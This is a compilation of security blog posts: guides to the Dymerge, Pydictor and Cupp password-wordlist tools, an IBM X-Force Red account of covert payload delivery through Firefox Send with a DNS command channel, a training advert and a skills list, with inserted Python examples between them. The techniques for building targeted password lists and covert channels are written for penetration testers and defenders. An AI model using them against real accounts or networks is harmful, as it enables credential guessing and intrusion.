Dymerge is a tool that gives you the ability to manage dictionaries. By manage we mean it gives you the ability to reshape and merge them. Reshaping and merging may seem trivial, but considering that you could be dealing with millions of words, even the smallest operation can turn into a mammoth and complicated task.

Installing and Launching Dymerge

We can install Dymerge from GitHub and launch it in a few simple commands. We have used the “-h” flag to display the various options Dymerge has to offer.

git clone https://github.com/k4m4/dymerge.git
cd dymerge
./dymerge.py -h

Standard Merge

We hope you have a few dictionaries handy to follow along with what we are doing. This is a standard merge, where we specify the paths to two different dictionaries and Dymerge combines them.

To avoid any confusion, the command is “./dymerge.py” followed by the path of the first dictionary, then a space and the path to the second dictionary. By default the output will be written to a file named “dymerged.txt”.

./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt

Fast Mode

Arguably if the dictionaries are very large, performing any operation on them will take time. The person who made Dymerge thought of this conundrum and gave us a way to speed up the process by using the “-f” flag.

./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -f

Removing Duplicates

A lot of dictionary-making tools follow the same logic, so there are bound to be overlapping words from time to time. Dymerge gives us the option to remove duplicate words while combining dictionaries. To achieve this, we will be using the “-u” flag.

./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -u -f

Reverse Listing

Dymerge gives us the option to reverse the order of the words in the dictionaries that we merge. This means that the first word in the new dictionary will be the last word of the second dictionary.

./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -r -f

Alphabetic and Numeric Sorting

This option lets us sort words alphabetically. It also sorts numbers by following the progression of a number line from left to right when merging two dictionaries into one. We will be using the “-s” flag to perform this operation.

./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -s -f

Defining Output

So far we have been letting Dymerge save the output using its default settings. This time we will define the file name and destination of the output by using the “-o” flag.

./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -s -f -o /root/output.txt

Including Characters

Just in case we find that we need something specific added to the dictionary, we can use the “-i” flag. Any characters placed after the include flag are added to the dictionary.

./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -s -f -i raj

And here we see “raj” being added to the dictionary.

Compressing Output

Dictionaries can be pretty big in size, especially when you’re talking about a unified dictionary comprised of multiple dictionaries. Dymerge gives us the option to compress our output using the “-z” flag.

./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -s -f -z zip

All said and done, this is a pretty neat little tool to use when you’re dealing with multiple dictionaries and need something to bring a little bit of order. The functions it performs may seem simple on the face of it, but they are without a doubt very useful.
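The same merge, de-duplicate, sort, reverse and include operations written out in Python, as an added example that is not Dymerge’s own code (the natural-sort key, the streaming reader and the zip wrapper are this example’s assumptions). A defender maintaining a banned-password blocklist from several breach corpora needs exactly these operations.

```python
"""Added example, not Dymerge's own code: the merge, de-duplicate (-u), sort (-s),
reverse (-r), include (-i) and zip (-z) operations from the walkthrough above,
implemented as one pass over the input lists. The natural-sort key, the streaming
reader and the zip wrapper are assumptions of this example, not Dymerge behaviour."""
import re
import zipfile
from typing import Iterable, Iterator, List, Sequence

_DIGIT_RUN = re.compile(r"(\d+)")


def natural_key(word: str):
    """Sort key that orders digit runs by value ("pass2" before "pass10") and puts
    purely numeric entries before alphabetic ones, like a number line."""
    # re.split with a capturing group alternates text, digits, text, ... so odd
    # positions are always the digit runs.
    return [int(chunk) if index % 2 else chunk
            for index, chunk in enumerate(_DIGIT_RUN.split(word))]


def read_words(paths: Iterable[str]) -> Iterator[str]:
    """Stream non-empty lines from each wordlist in turn, never loading a file twice."""
    for path in paths:
        with open(path, encoding="utf-8", errors="replace") as handle:
            for line in handle:
                word = line.rstrip("\r\n")
                if word:
                    yield word


def merge_words(words: Iterable[str], *, unique: bool = False, sort: bool = False,
                reverse: bool = False, include: Sequence[str] = ()) -> List[str]:
    """Combine one stream of words; the flags mirror the Dymerge switches used above."""
    merged = list(words)
    merged.extend(include)               # -i: extra words appended to the list
    if unique:                           # -u: drop repeats, keep first-seen order
        seen = set()
        deduped = []
        for word in merged:
            if word not in seen:
                seen.add(word)
                deduped.append(word)
        merged = deduped
    if sort:                             # -s: alphabetic, numbers in number-line order
        merged.sort(key=natural_key)
    if reverse:                          # -r: last word of the last list comes first
        merged.reverse()
    return merged


def merge_files(paths: Sequence[str], output: str = "dymerged.txt", *,
                compress: bool = False, **flags) -> int:
    """Merge wordlist files into `output` (or `output`.zip); returns the word count."""
    merged = merge_words(read_words(paths), **flags)
    text = "\n".join(merged) + "\n"
    if compress:                         # -z zip: one text member inside a zip archive
        with zipfile.ZipFile(output + ".zip", "w", zipfile.ZIP_DEFLATED) as archive:
            archive.writestr(output, text)
    else:
        with open(output, "w", encoding="utf-8") as handle:
            handle.write(text)
    return len(merged)


if __name__ == "__main__":
    # Constructed stand-in for two small dictionaries already read into memory.
    sample = ["password", "raj", "pass10", "pass2", "raj", "123456"]
    print(merge_words(sample, unique=True, sort=True, include=["raj2018"]))
```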

Stay tuned for more articles on the latest and greatest in hacking.

Author: Shubham Sharma is a Cyber security enthusiast and Researcher in the field of WebApp Penetration testing.

The post Comprehensive Guide on Dymerge appeared first on Hacking Articles.

Phish or Fox? A Penetration Testing Case Study From IBM X-Force Red

As you may know, IBM X-Force Red is IBM Security’s penetration testing team. The team features professional, world-class testers who help organizations find and manage their security vulnerabilities on any and all platforms, including software and hardware devices. Our motto is “hack anything to protect everything.”

This post features a case study from IBM X-Force Red that shows how we ran into trouble on a black-box penetration testing assignment, worked against a well-prepared blue team, and overcame the obstacles to ultimately establish a solid adversarial operation. Let’s take a closer look at what we did to get through security and, more importantly, what your team can do to better secure your organization in an ever-evolving adversarial landscape.

A Tale of an Undeliverable Payload

On one of our red team’s recent engagements with a customer’s blue team, we were tasked with delivering a malicious payload to network users without setting off security controls or alerting the defensive team.

As a first attempt, we sent a phishing email to feel out the level of awareness on the other side. The email message was rigged with our malicious payload, for which we selected the attachment type and a lure that would appear credible. However, the blue team on the other side must have been lying in wait for suspicious activity. Every one of our emails was delivered, but our payloads were not. The payloads did not call home to the control server we had set up, and we started getting visits from the defensive team in the form of an anti-malware sandbox.

Within minutes, additional sandboxes hit on our command and control (C&C) server’s handler, and soon more than 12 security vendor clouds were feasting on the payload. We understood at that point that our payload had been detected, analyzed and widely shared by the blue team, but since this was a black-box operation, we had little way of knowing what went wrong after sending out our rigged emails.

If the Phish Fails, Send in the Fox

Going back to the drawing board, we realized that we must have triggered the blue team’s dynamic malware detection systems and controls. We had to find a new way to deliver the payload in a more concealed manner — preferably encrypted — and to have it detonate only when it reached its final destination to prevent premature discovery.

To do so, we had to overcome some hurdles, including:

  • Sidestepping traffic inspection controls;
  • Opening a siloed channel to send information from outside into the organizational networks;
  • Decreasing repeatable sampling of our externally hosted content;
  • Minimizing the chance of attribution at the initial visit/download/delivery stages; and
  • Bypassing URL inspections.

Some creative thinking summoned a good candidate to help us overcome most controls, mostly because it is a legitimate service that people use in daily interactions: Mozilla’s Firefox Send (FFSend).

Before we continue to describe the use of FFSend, we would like to note here that it is a legitimate tool that can be used safely, and that it was not compromised. We also disclosed information in this blog to Mozilla ahead of its publication and received the company’s support.

The Right Fox for the Job

FFSend is a legitimate file transfer tool from Mozilla. It has several interesting features that make it a great tool for users, and when files are sent through, its developers indicate it will generate “a safe, private and encrypted link that automatically expires to ensure your stuff does not remain online forever.” This makes FFSend a useful way to send private files between people in a secure manner.

To send a file, the sender, accessing FFSend via a browser, uploads the file he or she wants to share with the recipient through a simple web interface. He or she receives a URL for a shared link and can send it to the recipient. The recipient visits the shared link and downloads the file, at which point the FFSend service “forgets” the link and removes shared content from the server.

Figure 1: Basic flow of events using FFSend

From our red team’s perspective, FFSend was a good fit for sending encrypted files. Let’s see how it answered some of the needs we defined.

FFSend allows for large file sizes up to 1 GB, which is large enough an allowance to both send a payload and exfiltrate data. This answered our need for a siloed, covert channel into the organization. It would encrypt and decrypt the payload for us with an AES-GCM algorithm directly in the internet browser, yet we won’t have to deal with any key generation or distribution. The payload would evade the inspection of intercepting proxies that can unwrap Transport Layer Security (TLS), and would remain private and won’t be shared with any party along the way, including Mozilla.

Figure 2: Schematic view of FFSend’s automated encryption

Since firefox.com is a trusted domain on most organizational controls, we gain yet another advantage by using FFSend. We won’t have to labor to set up a fake site that would raise suspicion, and we can still get our file’s link across to the recipient. The trusted Firefox domain is also more likely to slip through URL inspection and anti-phishing controls, as well as blacklists that organizations deploy to catch malicious content coming from rogue resources.

Figure 3: FFSend is considered a trusted source

As for reducing repeated sampling of the payload, we get that as well by setting a strict one-time-only limit on the number of times our FFSend link can be accessed after it’s generated, avoiding the sandbox attempts and threat sharing. Moreover, FFSend automatically expires links after 24 hours, which effectively makes the path to our payload self-destruct if the target has not opened it. Self-destruction is also featured on FFSend’s application program interface (API), so it can also be ordered ad hoc after a link is sent but before its default expiration.

Figure 4: FFSend’s link expiration and self-destruct schema

Avoiding attribution is also easier when using a legitimate service that implements ephemeral storage of the files it delivers. Using such a service allowed us to avoid any links back to our testers, since there was no account required to send a file, nor was information on the owner of the encrypted data sent, required or kept.

This meant our ownership of the malicious file would be anonymous, though there would still be a tie to our originating IP address and browser fingerprints. With most information concealed, we deemed this level of anonymity good enough for the desired outcome.

Figure 5: No sender identity required, no attribution links back to red team

Setting Up a Communications Channel

With the file sending issue resolved, we still needed a covert communication channel to help us establish an ongoing operation without being ousted by the blue team.

To set up a communications channel, we did not wish to start from scratch. We decided to use FFSend to make it work as the siloed, covert channel we needed. That was one problem solved, but to coordinate the sending and receiving of data over that channel, we would also need a side channel of communications to avoid inspection and detection.

Communication gets inspected by a number of security controls, so it is essential that we blend in with the environment. To do that, we would have to choose a communication protocol that would allow us to look like everyone else on the network. Looking at the typical choices — Hyper Text Transfer Protocol Secure (HTTPS), Internet Control Message Protocol (ICMP) and Domain Name System (DNS) protocols — we selected DNS for its decent packet capacity and overall better chance of blending in with legitimate user traffic.

DNS fit our need to implement a data channel to FFSend. Also, a command channel can offload to DNS. To make everything work together, DNS record content could be encrypted with the same FFSend shared key used to post the data link, keeping things consistent.

In our command protocol, we can accommodate short instructions and differentiate between the types of requests we want to task agents with, to run or receive responses on. For example, we can encode instructions such as fetch me <file> or execute <command>. The agent would then carry out the request and post the results over our FFSend data channel.

On the wire side, channel interaction will look like a well-formed dynamic DNS request, separate from an HTTPS channel used for data. This split would ensure avoiding traffic correlation.

The Foxtrot Control Server Rises

Once we knew how to set up our covert communications, we set up a rogue control server and named it Foxtrot. Foxtrot was a mechanism we used to facilitate communication between any number of the remote agents.

Having created Foxtrot with a modified FFSend service and a DNS side channel, IBM X-Force Red testers were able to push the initial payload to unsuspecting recipients. The payload circumvented dynamic defenses, helped our red team gain a foothold in the environment and established persistence to freely move data across intercepting proxies. We were also able to execute commands on compromised hosts, even when the defensive team had its security controls and monitoring turned on.

A Word to the Wise Defender

Red teams have the advantage of only needing to find one way in, while blue teams are tasked with securing all ways in and out. This one-sided advantage means that defenders have to keep a close eye on attack tactics, techniques and procedures (TTPs) and expect encryption and covert side channels to challenge existing automated controls.

After having achieved our goals, we came away with some tips for defenders that can help security teams prepare for the TTPs we used.

  • Expect to see the use of client-side encryption gain more prominence in adversarial workflows, and choose security controls accordingly.
  • Expect to see split-data and command channels grow in popularity among attackers, because this technique can help break automated analysis patterns employed by traditional security tools. Defenders should look into behavioral, heuristics-based detection, augmented by a fully staffed security operations center (SOC) to continuously detect split-channel operations.
  • X-Force Red encourages defensive teams to test their incident response (IR) processes against simulated attacker workflows that employ custom tooling capabilities.
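The behavioral detection the tips above call for, applied to the DNS command channel described in this case study, as an added example that is not code from the X-Force Red post or from Foxtrot. It scores each zone seen in resolver logs on unique query-name volume, entropy of the leftmost label and label length; the log format, thresholds and all hostnames are constructed for the example.

```python
"""Added example, not code from the X-Force Red post or from Foxtrot: a heuristic
detector for a DNS command channel where short instructions ride inside well-formed
queries to an attacker-controlled zone. Each zone is scored on three signals a SOC
can derive from resolver logs: unique query names, leftmost-label entropy and label
length. The log format, thresholds and every hostname below are constructed."""
import math
import re
from collections import defaultdict
from typing import Dict, List

# Constructed resolver log, one query per line: "<time> <client> <qname> <qtype>".
# example.com carries ordinary traffic; agent-zone.test mimics an encoded command channel.
SAMPLE_LOG = """\
10:15:01 10.0.0.5 www.example.com A
10:15:02 10.0.0.5 cdn.static.example.com A
10:15:03 10.0.0.7 mail.example.com MX
10:15:04 10.0.0.5 k3f9qz2wm7ha5prt.agent-zone.test TXT
10:15:05 10.0.0.9 host01.corp.example.com A
10:15:06 10.0.0.9 host02.corp.example.com A
10:15:09 10.0.0.5 b8d1xn6ye4cv0gqj.agent-zone.test TXT
10:15:11 10.0.0.9 host03.corp.example.com A
10:15:14 10.0.0.5 p2r7ks9mw3zt5hfa.agent-zone.test TXT
10:15:17 10.0.0.7 e7f2a91c0d4b83a6.dl.example.org A
10:15:19 10.0.0.5 z4q1vb8nc6xd2kly.agent-zone.test TXT
10:15:24 10.0.0.5 m9t3ef5ju7wq1rsa.agent-zone.test TXT
10:15:29 10.0.0.5 h6y2cn4lp8kb0gvx.agent-zone.test TXT
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")


def shannon_entropy(text: str) -> float:
    """Bits per character; encoded labels score near log2 of their alphabet size."""
    if not text:
        return 0.0
    length = len(text)
    counts = {ch: text.count(ch) for ch in set(text)}
    return -sum((n / length) * math.log2(n / length) for n in counts.values())


def zone_of(qname: str) -> str:
    """Approximate registrable zone as the last two labels (no public-suffix list here)."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def score_zones(log_text: str, *, min_unique: int = 5, min_entropy: float = 3.0,
                min_label_len: int = 12) -> Dict[str, dict]:
    """Aggregate queries per zone and flag zones whose names look machine-generated."""
    stats = defaultdict(lambda: {"names": set(), "clients": set(), "entropy": [], "length": []})
    for line in log_text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue                     # skip malformed lines rather than crash on them
        _, client, qname, _ = match.groups()
        leftmost = qname.split(".")[0]   # the label an agent would encode data into
        zone = stats[zone_of(qname)]
        zone["names"].add(qname.lower())
        zone["clients"].add(client)
        zone["entropy"].append(shannon_entropy(leftmost))
        zone["length"].append(len(leftmost))
    report = {}
    for name, zone in stats.items():
        count = len(zone["entropy"])
        mean_entropy = sum(zone["entropy"]) / count
        mean_length = sum(zone["length"]) / count
        report[name] = {
            "queries": count,
            "unique_names": len(zone["names"]),
            "clients": len(zone["clients"]),
            "mean_entropy": round(mean_entropy, 2),
            "mean_label_len": round(mean_length, 1),
            # All three must hold: volume alone would flag CDNs, entropy alone a single download.
            "suspicious": (len(zone["names"]) >= min_unique
                           and mean_entropy >= min_entropy
                           and mean_length >= min_label_len),
        }
    return report


def suspicious_zones(log_text: str, **thresholds) -> List[str]:
    """Zones that tripped every threshold, in a stable order for reporting."""
    return sorted(z for z, r in score_zones(log_text, **thresholds).items() if r["suspicious"])


if __name__ == "__main__":
    for zone_name, result in score_zones(SAMPLE_LOG).items():
        print(zone_name, result)
```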

What can teams do right now to get ahead of determined threat actors? Step up your security with pre-emptive action in the shape of professional penetration testing, and make sure the scope of the testing gradually covers both hardware and software. You should also consider adopting cognitive solutions to augment analysts’ capabilities and scale up as attacks grow more frequent and complex.


The post Phish or Fox? A Penetration Testing Case Study From IBM X-Force Red appeared first on Security Intelligence.

Comprehensive Guide on Pydictor – A wordlist Generating Tool

In this article we will explore another dictionary-building tool, “Pydictor”. These tools are always fun to work with, and this is another robust tool, perfect for generating custom dictionaries. The thing that stands out most about this tool is the customization options it offers, from the most common to the advanced.

Table of Content

  • What is Pydictor
  • Installation
  • Numeric Dictionary
  • Lower Case Alphabet Dictionary
  • Upper Case Alphabet Dictionary
  • Numeral Coupled With Upper Case Alphabet
  • Upper Case Coupled With Lower Case Alphabet
  • Numeral Coupled With Lower Case Alphabet
  • Combining Upper Case, Lower Case and Numeral
  • Adding Static Head
  • Adding Static Tail
  • Encoding
  • Character Permutation
  • Multiple Character Group Permutation
  • Social Engineering Dictionary
  • Customizing the Social Engineering Dictionary
  • Manipulating Dictionary Complexity Filter
  • Using Plugin
  • Leet Function

What is Pydictor

Pydictor is one of those tools that both novices and pros can appreciate. It is a dictionary-building tool that is great to have in your arsenal when dealing with password strength tests. The tool offers a plethora of features which can be used to create that perfect dictionary for pretty much any kind of testing situation.

Installation

Let’s get cracking. The first thing we do is download Pydictor from GitHub and run it using Python. Running the tool with no arguments displays its usage and the optional arguments it accepts.

git clone https://github.com/LandGrey/pydictor.git
cd pydictor
python pydictor.py

Numeric Dictionary

We begin by exploring the option to create a numeric (or, as the tool describes it, digital) dictionary. Let’s start by keeping it simple: only 5 characters long and limited to 0 – 5. We will be using the “-base” option to accomplish this.

The output is saved by default but in this case we will be saving it to “dict.txt”. The storage location will always appear after each execution. The “cat” command is used to view the output in the terminal.

python pydictor.py --len 5 5 -base d -o dict.txt

Lower Case Alphabet Dictionary

We will be making a dictionary which only holds lower case alphabets; the length of the words remains 5 characters.

python pydictor.py --len 5 5 -base L

Upper Case Alphabet Dictionary

We will now generate a dictionary with all the same metrics as earlier with the exception of changing the base option to upper case alphabets.

The result is shown below.

python pydictor.py --len 5 5 -base c

Numeric Coupled With Upper Case Alphabet

The base options in Pydictor can be used in conjunction with each other. In this instance we will be coupling numeric (d) and upper case alphabets (c). Let’s see what kind of output we get.

python pydictor.py --len 5 5 -base dc

Upper Case Coupled With Lower Case Alphabet

This time it’s going to be both upper and lower case alphabets together.

python pydictor.py --len 5 5 -base Lc

Numeral Coupled With Lower Case Alphabet

Let’s see what we get when we couple numerals with lower case alphabets.

python pydictor.py --len 5 5 -base dL

Combining Upper Case, Lower Case and Numeral

Now let’s combine all three options that we’ve been playing with: upper case, lower case and numeral. To keep the output moving quicker we will limit the word length to 3 characters.

python pydictor.py --len 3 3 -base dLc

Adding Static Head

We will now be adding a static head to all the words, note that the head is in addition to the 5 character length that is set. In this instance we will be adding “raj” as a static head in front of all the numerals.

python pydictor.py --len 5 5 --head raj -base d

Adding Static Tail

We will now be adding a static tail to all the words, note that as mentioned in the instance above, the tail is in addition to the 5 character length that is set. In this instance we will be adding “raj” as a static tail at the end of all the numerals.

python pydictor.py --len 5 5 --tail raj -base d

Encoding

Pydictor has an encode function that we can use to encode the words in the dictionary.

It gives us the option to choose from popular encoding, encryption and hashing algorithms such as Base64, DES, AES, MD5, SHA256, etc. In this instance we will be using Base64 as our algorithm of choice to encode numerals.

In the interest of thoroughness, we will first generate the numerals without encoding and then with encoding.

python pydictor.py --len 5 5 -base d

Now we see what the Base64 encoded output looks like

python pydictor.py --len 5 5 -base d --encode b64

Character Permutation

We can also generate permutations of a single word: Pydictor lets us choose a word and churn out as many permutations of it as possible.

python pydictor.py -char raj

Multiple Character Group Permutation

We’ll take Pydictor’s permutation prowess one step further by using the “-chunk” option.

This time we will be giving it multiple groups of characters, which it will take and churn out as many permutations as possible. It begins in a subtle way by manipulating just one group and then gradually moves on to the others. Notice the progression in the screenshot below.

python pydictor.py -chunk abc ABC 666 . _ @ "'

Social Engineering Dictionary

Pydictor comes with an inbuilt social engineering dictionary builder that lets testers input information from profiling an individual to get a custom tailored dictionary. We run the “help desc” within the social engineering dictionary builder option to see the various defaults it has to offer.

python pydictor.py --sedb

Customizing the Social Engineering Dictionary

“show option” is used within the social engineering dictionary builder to display the various vectors from profiling a target that can be set to generate a target-specific dictionary. In this instance we will only be inputting the name, birth date, email and phone number. The vectors are set using the “set” command.

Let’s see what our social engineering dictionary output looks like.

Manipulating Dictionary Complexity Filter

We will be doing two things in this instance: extending a dictionary based on a rule, and separating words filtered according to complexity level. The complexity level is set to 3 by default; we will take it up a notch by setting it to 4. The character length is set to a minimum of 1 and a maximum of 6.

We view the latter part of the output.

python pydictor.py -extend raj --level 4 --len 1 6

Using Plugin

Pydictor has plugins built into it by default. We will be using a plugin that bases its generation on the last 6 digits of a Chinese resident ID card number. We will filter it using the “-occur” function. The occur option takes three arguments, for letters, numerals and special characters, in that order. We will only be looking for results that have numerals occurring 4 times or more in a single string.

python pydictor.py -plug pid6 --types ">=0" ">=4" ">=0"

Leet Function

The leet function can selectively substitute numerals or special characters in place of alphabets; to illustrate, leet turns to L331. We will be using the leet function in conjunction with the occur option and the extend function.

This is a more complex ask than we have made of Pydictor in our earlier instances; let’s see what our output looks like.

python pydictor.py -extend /names.txt --leet 0 1 2 11 21 --len 4 16 --occur "<=10" ">0" "<=2"

We hope you enjoyed our little walkthrough of Pydictor. As mentioned earlier, dictionary generators are always a handy thing to have in your arsenal of pentesting tools. This tool gives the user a lot of advanced options, which can be a bit overwhelming unless the user has a very clear picture of what they want out of it.

Don’t be afraid of taking Pydictor for a spin and see what more you can derive out of it.

Stay tuned for more articles on the latest and greatest in hacking.

Author: Shubham Sharma is a Cyber security enthusiast and Researcher in the field of WebApp Penetration testing.

The post Comprehensive Guide on Pydictor – A wordlist Generating Tool appeared first on Hacking Articles.

Professionally Evil Insights: Spring Break without Breaking the Bank: Hands On Training

Over the last eight years, one of the main focuses of Secure Ideas has been education.  One responsibility we take very seriously is that of growing the skills within our clients and the public, with the objective of raising the bar in security.  This mindset and core passion of Secure Ideas is because we all believe that we stand on the shoulders of giants. As each of us has grown into the roles we currently hold, we were not only shaped and developed by our own experiences, but also by the knowledge shared by others.  This desire to learn and grow is one of the main things that make me proud to be a part of the security community.

However, there are a couple of significant problems with our industry:  First, information security needs are growing faster than skilled personnel are learning.  Second, the cost of training has increased outrageously over the past decade.

The first issue has been discussed for almost as long as I have been involved in information security.  Even Alan Paller of the SANS Institute has been speaking about the skills gap for over a decade!  The second issue is even worse as it makes it harder to fix the first.  Training costs for a single class often exceed $5000 without even factoring in travel and the time away from work. So how do we fix this?

At Secure Ideas, we have decided that it is our responsibility as active practitioners to help fix this lack of affordable training and help address the skills gap.  To that end, we are committed to the following for 2019:

  1. First, we want to announce our Professionally Evil Spring Break event.  This 3-day event will host two classes: Professionally Evil Network Security and Professionally Evil Application Security.  The first will focus on network penetration testing and the second focuses on application security and assessments. Either class is only $750, discounted to an early bird price of $600 until January 18, 2019.  Moreover, veterans, active duty military and first responders get either for 50% off.
  2. Second, our Secure Ideas Training site has recorded classes starting at $25 each and vets get them for free!  And our webcasts will continue to be run as often as we can.
  3. Third, we will continue to support and release our open-source training products such as SamuraiWTF and the Professionally Evil Web Penetration Testing 101 course.

We hope that together we can all help increase the skills of our industry and provide affordable training for all.  Let us know if you have any questions or if you would like us to run a private training for your organization.


Comprehensive Guide on Cupp– A wordlist Generating Tool

Hello Friends!! Today we are going to explore the functions of Cupp, a powerful tool that creates a wordlist tailored to a particular person, which can be used in a brute force attack for guessing login credentials.

Table of Content

  • Introduction to Cupp
  • How Cupp Works
  • Getting Started
  • Generating Custom Dictionary
  • Adding to Custom Dictionary
  • Downloading Dictionaries from Cupp Repository 
  • Downloading Default Usernames and Passwords
  • Quiet Mode

Introduction to Cupp

Cupp stands for Common User Passwords Profiler. This tool can be used in many circumstances, such as licensed penetration tests or forensic crime investigations. CUPP is cross-platform and written in Python; its functioning is simple but gives very powerful results. This application is a social engineer’s best friend when it comes to creating targeted password dictionaries which are tailored to an individual.

How Cupp Works

Cupp takes vectors from the profiling done for an individual, such as their nickname, pet’s name, child’s birthdate, etc. It works on the principle that a password is, more often than not, a combination of things known to an individual. These known things are often personal details that are very close to the person’s heart.

In cases where a person might use special notations in place of alphabets (e.g., leet written as 133t), Cupp has you covered.

Installation and Configuration

Cupp can be downloaded from GitHub using the “git clone” command. Within the downloaded Cupp folder, run the “cupp.py” file. Once the file is run, the program shows you the various options it has to offer.

git clone https://github.com/Mebus/cupp.git
cd cupp
ls
./cupp.py

Optional Arguments:

-i      Interactive questions for user password profiling

-w FILENAME      Use this option to profile existing dictionary,

-l      Download huge wordlists from repository

-a      Parse default usernames and passwords directly from Alecto DB.

Project Alecto uses purified databases of Phenoelit and CIRT which merged and enhanced.

-v      Version of the program

Generating Custom Dictionary

Now it’s time to have some fun!

We will be using the interactive option to generate the custom dictionary. You will see that we have the option to input details such as pet’s name, child’s name, partner’s nickname, etc. All these things are highly personal, and it is very common to find them in a password, one way or another.

There’s also an option to add any specific keywords, special characters and random numbers. Apart from all this, there’s the option to activate Leet mode, this will make the generated dictionary extremely effective.

That’s all; the dictionary is now generated and saved.

./cupp.py -i

Adding to Custom Dictionary

Cupp gives us the option to add more words to our created dictionary. We can customize the kind of words we would like to add by using the provided options.

./cupp.py -w raj.txt

Now that we have successfully executed the command, let’s traverse to the location to check whether the output has been saved to the file or not. In this case our output location is /root/cupp/raj.txt.cupp.txt

Downloading Dictionaries from Cupp Repository 

Cupp has its own repository of dictionaries which are pre-classified. These dictionaries can be downloaded and used. The downloaded files are compressed and have to be uncompressed to be viewed.

Enter the number of the dictionary you want to download. We pressed 16 and downloaded a dictionary of Hindi names to view it.

./cupp.py -l
cd dictionaries
cd hindi
gzip -d hindu-names.gz
cat hindu-names

Downloading Default Usernames and Passwords

Cupp can download premade dictionaries holding the most common usernames and passwords from the project Alecto database for usage.

./cupp.py -a
ls
cat alectodb-password.txt

Quiet Mode

Quiet mode is for running Cupp in a more hush-hush way. If you’re the kind of person who does not want a big banner on their screen showing everyone what you’re doing, you’ll like this option. This basically makes for a cleaner screen while Cupp is carrying out the commands you’re giving it, without the funny cow popping up on top.

We’re going to couple the quiet mode option with the dictionary download option that we demonstrated above.

./cupp.py -a -q

We hope you enjoyed this basic walkthrough of the Cupp application. It is a very handy and easy to use tool when it comes to making custom dictionaries. Go ahead and see if it can guess your password.
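The defender-side counterpart to the profile-driven wordlists that both the Cupp and Pydictor walkthroughs above build, as an added example that is not code from these posts nor from either tool: a password-policy check that folds leet substitutions back and rejects any password still containing a token derived from the user’s profile (name, pet, birth date, company) or from date fragments. The profile keys, sample profile, leet map and MIN_TOKEN are assumptions of this example.

```python
"""Added example, not code from the Hacking Articles posts nor from Cupp or
Pydictor: a password-policy check that mirrors what profile-driven wordlists
exploit. Cupp and Pydictor combine a person's name, pet, birth date and similar
vectors with leet substitutions and static heads or tails; this check undoes the
substitutions and rejects any password that still contains a profile token.
The profile keys, sample profile, leet map and MIN_TOKEN are assumptions."""
import re
from typing import Dict, List, Set

# Reverse of the common leet substitutions the posts mention ("leet" -> "133t").
UNLEET = str.maketrans({"4": "a", "@": "a", "3": "e", "1": "i",
                        "0": "o", "5": "s", "$": "s", "7": "t"})
MIN_TOKEN = 3   # shorter fragments would match almost any password


def normalize(password: str) -> str:
    """Lower-case and undo leet so 'R4j' compares as 'raj'."""
    return password.lower().translate(UNLEET)


def date_tokens(iso_date: str) -> Set[str]:
    """Date fragments people splice into passwords, from a YYYY-MM-DD string."""
    year, month, day = iso_date.split("-")
    short_year = year[2:]
    return {year, day + month, month + day, day + month + year,
            day + month + short_year, month + day + year, year + month + day}


def profile_tokens(profile: Dict[str, str]) -> Set[str]:
    """Lower-cased tokens from each profile field: every word, the words joined,
    and date fragments for the 'birthdate' field."""
    tokens: Set[str] = set()
    for field, value in profile.items():
        if not value:
            continue
        if field == "birthdate":
            tokens |= date_tokens(value)
            continue
        words = [w for w in re.split(r"[\s._-]+", value) if w]
        for word in words + ["".join(words)]:
            token = word.lower()
            if len(token) >= MIN_TOKEN:
                tokens.add(token)
    return tokens


def profile_hits(password: str, profile: Dict[str, str]) -> List[str]:
    """Profile tokens found in the password, checked against both the raw
    lower-cased form (so digits in dates survive) and the de-leeted form."""
    forms = (password.lower(), normalize(password))
    hits = [t for t in profile_tokens(profile) if any(t in form for form in forms)]
    return sorted(hits, key=lambda t: (-len(t), t))   # longest first, then alphabetical


def is_profile_derived(password: str, profile: Dict[str, str]) -> bool:
    """True when the policy should reject the password."""
    return bool(profile_hits(password, profile))


# Constructed sample profile, in the spirit of Cupp's interactive questions.
SAMPLE_PROFILE = {
    "name": "Raj Chandel",
    "nickname": "raj",
    "pet": "Rocky",
    "birthdate": "1990-05-12",
    "company": "Hacking Articles",
}

if __name__ == "__main__":
    for candidate in ("R4j@1990", "r0cky12051990", "Tr0ub4dor&3", "HackingArticles!"):
        print(candidate, "->", profile_hits(candidate, SAMPLE_PROFILE) or "ok")
```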

Stay tuned for more articles on the latest and greatest in hacking!!!


Author: Shubham Sharma is a Cyber security enthusiast and Researcher in the field of WebApp Penetration testing.

The post Comprehensive Guide on Cupp– A wordlist Generating Tool appeared first on Hacking Articles.

Top 10 Skills Every Purple Teamer Must Have

Today, cyber threats are created faster and are in a more sophisticated manner than ever before. Bad actors are ready to go the extra mile to get their hands on all types of organizations, industries, and information. So, in a hyper-connected world where everyone is a target, what are the top skills purple teamers need to have? Find out.
  1. Web Application Penetration Testing — It is the process of using penetration testing techniques on a web application to detect its vulnerabilities before cybercriminals do.
  2. Mobile Penetration Testing — Mobile apps are becoming an increasing asset for businesses, but a threat at the same time. To make sure customers’ data is secure, mobile apps need to be tested for vulnerabilities as well.
  3. WiFi Penetration Testing —  A compromised WiFi network puts an entire organization’s network at risk. WiFi penetration testing is a crucial skill for IT security professionals in 2018, and hiring managers know it.
  4. Advanced Social Engineering — Knowing the various means by which attackers can use social engineering techniques to gain access to an organization’s data is a great skill for all security professionals. You’ll need to be aware of the psychology and technical elements involved in phishing, vishing, baiting, etc.
  5. Advanced Adversary Simulation — By performing security assessments that simulate adversary attacks, an organization’s security is put to the test — from inside out, and focused on what attackers can get access to when successfully penetrating an organization’s environment.
  6. Defense Evasion — Defense Evasion is a tactic an adversary may use to bypass an information security device in order to ‘evade’ detection, or other defenses. Needless to say, it’s a red-teamer’s essential skill too.
  7. Threat Hunting — Threat Hunting skills come with knowing how to proactively search through networks to detect and isolate advanced threats that may have evaded existing security solutions.
